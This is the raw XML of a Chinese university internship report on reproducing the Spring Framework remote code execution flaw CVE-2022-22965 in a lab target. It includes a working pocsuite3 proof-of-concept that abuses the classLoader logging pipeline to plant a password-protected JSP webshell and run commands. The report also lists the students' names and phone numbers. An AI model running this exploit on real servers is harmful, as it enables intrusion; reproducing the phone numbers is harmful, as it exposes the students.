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ajorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pP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南开大学</w:t>
      </w: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实习实训漏洞复现报告</w:t>
      </w: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br w:type="textWrapping"/>
      </w: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0" w:firstLineChars="0"/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20"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/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r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">   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480"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/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20"/>
        <w:ind w:firstLine="480"/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3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>年</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>月21日</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="21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eastAsia" w:cstheme="majorEastAsia"/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:instrText xml:space="preserve">TOC \o "1-3" \h \u </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cstheme="majorEastAsia"/>
          <w:bCs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"_Toc28487" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.漏洞复现结论（</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5分）</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc28487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"_Toc7481" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>1.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>风险等级分布</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc7481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"_Toc24528" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.工作计划（25分）</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc24528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"_Toc13939" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>2.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工作人员</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc13939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"_Toc3137" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>2.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞对象</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc3137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"_Toc7909" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>2.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞复现阶段</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc7909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"_Toc1860" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.4风险等级</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc1860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"_Toc6133" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.漏洞复现过程（</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5分）</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc6133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"_Toc18532" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.1 风险管理及规避</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc18532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"_Toc4033" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/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_Toc4033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"_Toc28445" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w: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r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc28445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"_Toc12892" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4. 漏洞复现结果（25分）</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc12892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"_Toc32666" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4.1 POC插件编写</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc32666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"_Toc25120" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4.2 漏洞信息</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc25120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rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
    </w:p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r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.漏洞复现结论（</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5分）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="400" w:lineRule="exact"/>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>南开大学实习实训第十一组的安全人员采用科学的漏洞复现步骤于2023年7月18日至2023年7月20日对Spring Framework远程代码执行漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>进行了全面深入的漏洞复现。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:rFonts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本次共发现漏洞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个，其高危漏洞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个，中危漏洞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个,低危漏洞0个。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714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5" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF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1595" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="20"/>
              <w:spacing w:after="120"/>
              <w:ind w:firstLine="0" w:firstLineChars="0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Spring Framework远程代码执行漏洞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szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default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 (CVE-2022-22965)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2213" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="156"/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595" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="20"/>
              <w:spacing w:after="120"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体" w:eastAsiaTheme="minorEastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="0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714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3" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="0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spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:r>
        <w:t>1.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>风险等级分布</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>本次评估漏洞的详细风险等级分布如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pP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CVE-2022-29405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宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="宋体" w:eastAsiaTheme="minorEastAsia"/>
          <w:szCs w:val="24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CVE-2022-22965 已由 security@vmware.com 分配用于跟踪漏洞 - 当前被评为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FFFFFF"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="D9534F"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>严重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性。</w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5274310" cy="2306320"/>
            <wp:effectExtent l="0" t="0" r="1397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312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.工作计划（25分）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:r>
        <w:t>2.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工作人员</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="15"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="1974" w:tblpY="256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22"/>
        <w:gridCol w:w="1138"/>
        <w:gridCol w:w="4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王伯雅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15503567789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李佳豪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13191110713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刘哲泽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16650717520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钟雨哲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17879630977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吴帅达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13375663376</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:r>
        <w:t>2.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞对象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Spring Framework远程代码执行漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="156" w:after="156"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>2.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞复现阶段</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="15"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="1852" w:tblpY="341"/>
        <w:tblOverlap w:val="never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burpsuite,设置浏览器代理；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Linux操作系统（vulhub）或者在春秋靶场内的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>CVE-2022-22965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环境；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安装pocsuite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3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,完成POC本地测试环境搭建。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bookmarkStart w:id="0" w:name="_Hlk109311036"/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69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288" w:lineRule="atLeast"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia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①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访问网页并且进行抓包，修改红色框中的内容，其内容的简单目的是写入恶意代码到webapps/ROOT目录下的fuck.</w:t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"https://so.csdn.net/so/search?q=jsp%E6%96%87%E4%BB%B6&amp;spm=1001.2101.3001.7020" \t "https://blog.csdn.net/weixin_45715461/article/details/_blank" </w:instrText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jsp文件</w:t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中，在访问该文件的时候，需要验证密码pwd之后才能够执行需要执行的命令cmd。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4343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 xml:space="preserve">    POC插件编写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根据命令执行和文件上传POC的模板进行POC的编写。用burpsuite进行抓包，获得路径、数据、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headers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等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，填写到P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平台提交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登录3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60 POC++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平台，提交P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2.4风险等级</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="15"/>
        <w:tblW w:w="8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651"/>
        <w:gridCol w:w="5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>
            <w:pPr>
              <w:ind w:firstLine="480" w:firstLineChars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高</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>危</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5721" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr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该CVE-2022-22965是在Java 9的环境下，引入了class.module.classLoader，导致了CVE-2010-1622漏洞补丁的绕过，JDK9中存在可以绕过黑名单禁用的类，导致了这个漏洞。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5721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</w:tbl>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="312" w:after="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.漏洞复现过程（</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5分）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>春秋云境开启靶机：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环境：http://eci-2ze8wvg9bxev0fnlbj51.cloudeci1.ichunqiu.com:8080/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②提交数据包，写jsp文件：（在实际利用中，这一步是更改 Apache Tomcat 中的日志记录配置并将日志写入 JSP 文件）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2040" cy="2332355"/>
            <wp:effectExtent l="0" t="0" r="5080" b="14605"/>
            <wp:docPr id="4" name="图片 4" descr="6a121c5145690984446e49be799e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a121c5145690984446e49be799eb1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③访问刚才的 JSP webshell，并执行任意命令：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61995" cy="1758315"/>
            <wp:effectExtent l="0" t="0" r="14605" b="9525"/>
            <wp:docPr id="6" name="图片 6" descr="720a07def948554c30c364d223d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0a07def948554c30c364d223d50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④利用刚刚写入的用户名密码，获取网站目录下的文件：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8127365</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3511550" cy="1896110"/>
            <wp:effectExtent l="0" t="0" r="8890" b="8890"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="7" name="图片 7" descr="cb21181a366c6e323e786c0171f1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b21181a366c6e323e786c0171f150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56" w:after="156"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.1 风险管理及规避</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将环境下载到本地进行实验，不要对线上的运营中的网站进行测试，以免造成信息泄露干扰正常运营。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="156" w:after="15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</w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在本地搭建平台进行漏洞复现，在360指纹平台查询应用指纹，没有找到后提交指纹。通过在burpsuite抓包放包的方式编写poc代码，并在python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的pocsuite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环境下测试poc代码。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3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</w:p>
    <w:p>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ire</w:t>
      </w:r>
      <w:r>
        <w:t>fox-latest; pocsuite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>; kali-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>purple</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>burp suite professional v</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2023.4.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="312" w:after="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞复现结果（25分）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4.1 POC插件编写</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/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>远程代码执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：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# !/usr/bin/env python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# -*- coding: UTF-8 -*-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import random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import string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import calendar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import time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from urllib.parse import urlparse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from pocsuite3.api import Output, POCBase, POC_CATEGORY, register_poc, requests, VUL_TYPE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from urllib.parse import quote,unquote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class spring_core_rce(POCBase):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vulID = 'CVE-2022-22965'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version = ''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author = ['']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vulDate = '2023-07-18'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createDate = ''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updateDate = ''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references = ['']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name = '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cstheme="minorHAnsi"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>By Wang</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cstheme="minorHAnsi"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>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appPowerLink = ''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appName = ''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appVersion = """"""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vulType = VUL_TYPE.CODE_EXECUTION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desc = ''''''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samples = ['']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install_requires = ['']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category = POC_CATEGORY.EXPLOITS.WEBAPP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def _verify(self):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result = {}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target = self.url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self.timeout = 5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if target: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try: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self.timeout = 5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Sname = ''.join(random.sample(string.ascii_letters + string.digits, 5))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Spwd = ''.join(random.sample(string.ascii_letters + string.digits, 16))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Stime = calendar.timegm(time.gmtime())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vulurl = target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parse = urlparse(vulurl)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headers = {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"Host": "{}".format(parse.netloc),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"suffix": "%&gt;//",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"c1": "Runtime",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"c2": "&lt;%",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"DNT": "1",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"Content-Type": "application/x-www-form-urlencoded"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}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data = "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22{Spwd}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resources.context.parent.pipeline.first.directory=webapps/ROOT&amp;class.module.classLoader.resources.context.parent.pipeline.first.prefix={Sname}&amp;class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat={Stime}".format(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Sname=Sname, Spwd=Spwd,Stime=Stime)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try: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r = requests.post(vulurl, data=data,headers=headers, allow_redirects=False,timeout=self.timeout,verify=False)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except Exception as e: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print(e)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else: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path = "/{Sname}{Stime}.jsp?pwd={Spwd}&amp;cmd=id".format(Sname=Sname, Spwd=Spwd,Stime=Stime)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Gurl = vulurl + path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if r.status_code == 200 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try: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time.sleep(10)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resq = requests.get(Gurl,timeout=self.timeout,allow_redirects=False,verify=False)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print(resq.status_code)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except Exception as e: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print(e)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return False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else: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if resq.status_code == 200 and "uid=" in resq.text and "groups=" in resq.text and "gid=" in resq.text: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        result['VerifyInfo'] = {}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        result['VerifyInfo']['URL'] = Gurl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                    result['VerifyInfo']['result'] = resq.text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except Exception as e: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    print(e)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return self.parse_output(result)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def _attack(self):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return self._verify()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def parse_output(self, result):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output = Output(self)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if result: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output.success(result)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else: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    output.fail('target is not vulnerable')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 xml:space="preserve">        return output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 w:eastAsia="宋体" w:cstheme="minorHAnsi"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cstheme="minorHAnsi"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>register_poc(spring_core_rce)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体" w:cstheme="minorHAnsi"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4.2 漏洞信息</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:color w:val="00B0F0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="15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268"/>
        <w:gridCol w:w="1935"/>
        <w:gridCol w:w="1300"/>
        <w:gridCol w:w="1539"/>
        <w:gridCol w:w="1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UVD-ID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hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsiaTheme="minorEastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pP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远程代码执行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2022-2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAns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2965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00" w:lineRule="exact"/>
              <w:textAlignment w:val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>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>/7/18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CNNVD-ID：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>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>/7/20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CNVD-ID：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高危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王伯雅/</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="23"/>
              <w:spacing w:line="480" w:lineRule="auto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钟雨哲</w:t>
            </w:r>
            <w:bookmarkStart w:id="1" w:name="_GoBack"/>
